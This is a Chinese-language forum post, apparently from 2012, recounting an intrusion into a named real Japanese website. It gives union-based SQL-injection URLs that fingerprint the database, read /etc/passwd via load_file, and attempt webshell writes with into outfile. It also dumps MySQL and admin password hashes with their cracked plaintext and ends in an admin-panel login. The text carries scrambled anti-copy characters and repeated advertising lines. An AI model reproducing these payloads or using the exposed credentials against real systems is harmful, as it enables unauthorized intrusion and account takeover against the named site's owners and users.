|
|
% C, h6 a5 l4 L! t* g* D, M
/ Q! D* u3 n( ]0x01. 检测 www.zuaa.jp 收集数据' K: f8 x, r6 R' h
& N" S- `; U8 B6 _5 ]1 @; q5 w) D N" u2 w' ^
whatweb2 W* A- B: Y& S. @6 f7 n) r9 z
% Y! V/ [$ s. ~
7 d' W+ L, k. B& Z) I3 I4 }8 b, X利用NMAP扫描
: t5 _' ]0 n; t. [0 ^" o9 H, \2 r8 H7 s: @- t
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
- E9 C4 n- X5 e* C6 w0x02.找注入点
A$ B% x5 q% y& d% V6 _找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
; z' d) x6 p+ w* V% l. v
+ A7 |6 z# Z7 Z1 A9 C0 s8 s% e: r2 ^" H9 M' b# g
0x03.order by
% g; j+ I5 }+ @' e http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 16 l1 i4 z+ u" d3 }) c
3 Z' F3 J, M; [" _! H
order by 28报错,order by 27正常
: o. ?/ G8 n ~. ~* `. }' a" ?
* Y+ }7 S0 q# s% ~) R0x04. union手动查询
. S# T- L2 z1 k& H. J" l- o+ Ihttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 7 ?; }& y0 M! X& O- k& \
添加到 27 时正常显示 8 C8 T% B9 f5 c% X2 [1 w7 Z
4 r u: I2 f- L, W0 G7 \' H' D' N% ^中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
5 i& g% N% G" Z1 m6 b0 J- P$ A4 ?% k; N0 B; [ [( S1 G
0x05. info:
" m0 ?# T X3 chttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
" D4 ^; y" K5 T" |9 B
3 l1 i; b. T) l- muser: root@localhost+ V1 k/ _ K) y7 K' X7 \
database: openpne+ H& \; |& A# x* x, l0 m
version: 4.1.22
( ~, @, g" U, h' |os: portbld-freebsd5.4
0 m% A! L3 J: X) r+ T9 j4 G
" k% f# u9 q5 V$ O+ p! ? I9 O- ~: T0x06. root用户1 @! R0 n2 K& Y& x% B
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站). r& u! g. c0 l2 q7 f
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
8 I( v9 ^, V, b! k1 X+ Y" {5 \0 C/ V W5 F% a7 j* W, X
通过工具转换
7 y0 \0 D$ t& M
0 S' @3 @/ b8 V0 S! ?中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
1 L/ a2 @2 E$ s9 \0 M* S* D( O/ y& D9 F
0x07. 利用 into outfile
8 e) Y1 L6 T/ l7 v/ l全部都失败) n0 ]# W/ U! a" h6 W8 n
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
- I7 s" |) t0 @8 P6 `3 R+ l- |- X" J5 M" h; [1 w+ x2 N
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php $ ^, u" q2 O: q- I/ h1 f
+ J* [! g3 s* ~ }
页面显示“MDB2 Error:syntax error”
# Q0 b; X2 u% t9 ` ?8 N/ r# t* L. g- j% y3 `& A. X) q
0x08. 利用 mysql 4.12 V" {) V& g: a7 O5 ^
猜常规表名,字段未果 工具 sqlmap9 q2 E3 `: P8 j/ J. l6 @
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
0 ]9 I" l% S0 q; D* u: K: i
: f, {! b" M0 T* c8 I& E/ c
1 f8 W% h/ A4 y* {
1 Q6 D" S& Q4 H3 N4 t0x09. 查找后台4 G0 `1 m9 p) H* ^4 F2 N4 L0 K
利用 现有的各种 后台工具尝试都不行
8 a+ \$ M4 s" D% t( }2 W
/ s# S; W' G. W. f0 u6 s0x10. MySL外联方法
% B: f& e6 u3 G5 a7 A! _4 J从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
- t: k0 V$ B# Y/ [可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
4 h+ u- j* [6 N9 y; B# \http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user0 V m& B" Q3 _8 y9 r. K5 Z3 q
2 Y5 D. ~; S$ A/ r m- e
这个可以在 www.cmd5.com 解密
6 ^8 i% v( ^# F' c) s: Rroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009. Q7 }7 o3 c2 r' d
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
z. p1 V2 b5 \/ ropenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
8 f& D* v( E$ Q. b5 K/ wzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???, B7 g: @; H7 K/ J/ g
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知/ s: K9 |: \: `' k9 b$ V
$ Q& O3 h1 z5 z
4 I* `2 X5 ?) q2 Z9 N0x11. 网站突破3 Y; _1 d8 {# t7 V+ f/ F
发现网站的源程序 openpne, google 下载 openpne 源码; O% v( {- p: `" d4 C
1 ~: n3 H7 d0 X$ J7 Y/ `# w, |+ h) I
0x12. 默认信息利用
& k- O3 g! a3 e& t) r( u: l" Dhttp://sns.zuaa.jp/?m=admin&a=page_login) D/ q# Y9 T+ \1 w
# }/ L6 @8 k3 {1 E6 ]- R表名 (c_admin_user) ,字段名(username,password), a% K. ^( Q9 t; _! ~" e
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
6 a8 y% U6 X6 n( M& o+ G2 r% w5 ?; ]$ e' i% {
解密* X" {& ]/ S" {+ I4 i1 D
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009" u7 v1 u3 n' a) s0 n# I. n$ x
zuaajp:c0923ec5857796a393da99905008c176, zju1897
% {1 a4 R4 {! t* K- V% W+ `% c( b2 c4 [7 k" c" O
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持+ A A x" J; d8 \ |; G
/ _: L, c5 ` [3 H6 ]0 S0x13. 登录后台# }2 U4 p' J: I- F# k
' l1 O- O$ a* V. `9 I+ n- h) ~, i6 g2 U1 \' n
- r% S0 F! n1 e' w& T; Z& x
0x14. 小结 H" s* X* t) Y! N. B5 z
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
7 [) a0 g& \# m1 Z5 Z" r感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
' ^( j. H/ z8 W3 F7 t' O------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain6 P6 \+ R) x) ]
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持; `; y6 D6 e4 w( e1 j+ R
# U$ v* W( Q9 i) I) }最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!/ N: ^+ Z9 t. F; K
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|
发表于 2012-9-17 16:22:02
收藏
支持
反对
发表于 2012-9-19 08:27:03